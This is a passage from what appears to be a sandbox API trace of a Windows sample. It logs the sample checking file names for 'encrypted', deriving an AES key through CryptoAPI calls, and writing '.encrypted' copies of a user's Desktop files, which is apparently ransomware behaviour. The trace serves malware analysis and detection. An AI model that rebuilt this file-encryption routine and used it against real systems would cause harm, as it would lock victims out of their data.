lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lK15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="15Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vz5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rsB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sB1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="On7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ytvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tvakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vakX.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.491] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.491] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0031.491] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.491] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.492] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.492] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.492] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.492] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.492] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabf0b1a0, ftCreationTime.dwHighDateTime=0x1d5c36c, ftLastAccessTime.dwLowDateTime=0xf3fa9760, ftLastAccessTime.dwHighDateTime=0x1d5bd2a, ftLastWriteTime.dwLowDateTime=0xf3fa9760, ftLastWriteTime.dwHighDateTime=0x1d5bd2a, nFileSizeHigh=0x0, nFileSizeLow=0x8427, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="rsB1On7F5ytvakX.ppt", cAlternateFileName="RSB1ON~1.PPT")) returned 0x7c2240 [0031.492] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.492] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.492] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.492] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0031.492] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0031.492] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.492] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0031.493] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0031.493] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.493] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0031.494] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.494] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.494] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.494] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.494] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.494] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0031.494] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0031.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0031.494] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.494] CryptHashData (hHash=0x7c2100, pbData=0x7c7758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0031.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0031.494] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0031.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0031.494] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.494] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0031.494] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.495] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.495] CryptDestroyHash (hHash=0x7c2100) returned 1 [0031.495] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\rsb1on7f5ytvakx.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.495] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.495] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0031.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0031.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0031.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.495] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0031.495] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0031.495] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.495] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0031.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0031.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0031.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0031.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0031.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0031.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0031.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0031.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0031.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0031.497] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k")) returned 0x10 [0031.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0031.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0031.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.497] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0031.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.497] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\rsB1On7F5ytvakX.encrypted.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\rsb1on7f5ytvakx.encrypted.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0031.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0031.497] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0031.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0031.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.498] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0031.498] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0031.498] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0031.498] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.498] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.498] HeapFree (in: 